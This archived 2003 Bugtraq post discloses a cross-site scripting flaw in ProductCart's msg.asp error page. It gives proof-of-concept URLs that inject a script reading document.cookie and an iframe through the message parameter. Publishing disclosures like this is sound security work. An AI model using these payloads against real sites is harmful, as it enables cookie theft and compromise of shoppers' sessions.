[30629] in bugtraq

home help back first fref pref prev next nref lref last post

ProductCart XSS Vulnerability

daemon@ATHENA.MIT.EDU (atomix atomix)
Mon Jul 7 18:59:37 2003

Date: 5 Jul 2003 05:29:49 -0000
Message-ID: <20030705052949.8408.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: atomix atomix <at0mix87@yahoo.com>
To: bugtraq@securityfocus.com



#####################
#  ProductCart XSS  #
#   Vulnerability   #
#  found by atomix  #
#####################

i came across the fact that in an area of ProductCart you are able to 
manipulate the error message, therefore allowing tags such as &lt;script&gt; and 
<iframe> to be used:

http://www.website.com/ProductCart/pc/msg.asp?message=>&lt;script&gt;alert
(document.cookie);&lt;/script&gt;

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>

-atomix | atom b0mbs

home help back first fref pref prev next nref lref last post